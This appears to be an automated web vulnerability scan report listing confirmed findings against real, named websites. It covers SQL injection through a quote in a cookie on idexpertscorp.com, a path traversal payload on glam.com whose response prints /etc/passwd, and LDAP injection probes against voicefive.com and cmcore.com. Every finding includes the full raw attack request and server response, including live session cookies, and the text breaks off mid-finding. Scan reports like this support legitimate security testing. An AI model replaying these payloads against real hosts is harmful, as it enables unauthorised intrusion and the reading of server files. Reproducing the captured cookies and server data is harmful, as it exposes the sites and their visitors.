User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376082; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-7; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.7.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.7.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:52:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376745; expires=Tue, 01-May-2012 15:52:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:52:25 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.38. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/tags/tag/breach+notification

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/tags/tag/breach+notification HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376560; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-8; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.8.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.8.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:51:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376709; expires=Tue, 01-May-2012 15:51:49 GMT; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:51:49 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.39. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/ [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/tags/tag/breach+notification/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/tags/tag/breach+notification/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376560; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-8; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.8.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.8.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:52:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376738; expires=Tue, 01-May-2012 15:52:18 GMT; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:52:18 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.40. http://www2.idexpertscorp.com/breach-tools [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; exp_last_activity=1304376583; __unam=440469-12fb26a1110-5868adc8-9; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.9.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.9.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376803; expires=Tue, 01-May-2012 15:53:23 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbreach-tools%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.41. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/ [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools/breach-healthcheck/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools/breach-healthcheck/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; exp_last_activity=1304376583; __unam=440469-12fb26a1110-5868adc8-9; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.9.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.9.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:54:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376872; expires=Tue, 01-May-2012 15:54:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.42. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/ [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools/radar-for-phi-1/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools/radar-for-phi-1/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376589; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-10; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.10.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.10.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376880; expires=Tue, 01-May-2012 15:54:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fbreach-tools%2Fradar-for-phi-1%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A4%3Bs%3A9%3A%22%2Fcontact%2F%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.43. http://www2.idexpertscorp.com/contact [exp_super_search_history cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /contact

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /contact HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_last_activity=1304375581; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=440469-12fb26a1110-5868adc8-2; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.2.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.2.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:42:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376125; expires=Tue, 01-May-2012 15:42:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Set-Cookie: PHPSESSID=lbchnsd618s1qle9mcv7v84hq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=0&adSize=970x66 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Mon, 02 May 2011 13:05:45 GMT
Connection: close
Content-Length: 2009

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. LDAP injection  previous  next
There are 2 instances of this issue:


3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9cedc10e48d229ef)(sn=* and 9cedc10e48d229ef)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=9cedc10e48d229ef)(sn=*&PRAd=253732016&AR_C=194941054 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=26&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 12:45:52 2011&prad=253735207&arc=207615337&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 14:58:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_9cedc10e48d229ef&#41;&#40;sn=exp=1&initExp=Mon May 2 14:58:49 2011&recExp=Mon May 2 14:58:49 2011&prad=253732016&arc=194941054&; expires=Sun 31-Jul-2011 14:58:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304348329; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=9cedc10e48d229ef)!(sn=*&PRAd=253732016&AR_C=194941054 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=26&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 12:45:52 2011&prad=253735207&arc=207615337&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 14:58:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_9cedc10e48d229ef&#41;!&#40;sn=exp=1&initExp=Mon May 2 14:58:49 2011&recExp=Mon May 2 14:58:49 2011&prad=253732016&arc=194941054&; expires=Sun 31-Jul-2011 14:58:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304348329; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3.2. http://data.cmcore.com/imp [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8c2b229d97e563c0)(sn=* and 8c2b229d97e563c0)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

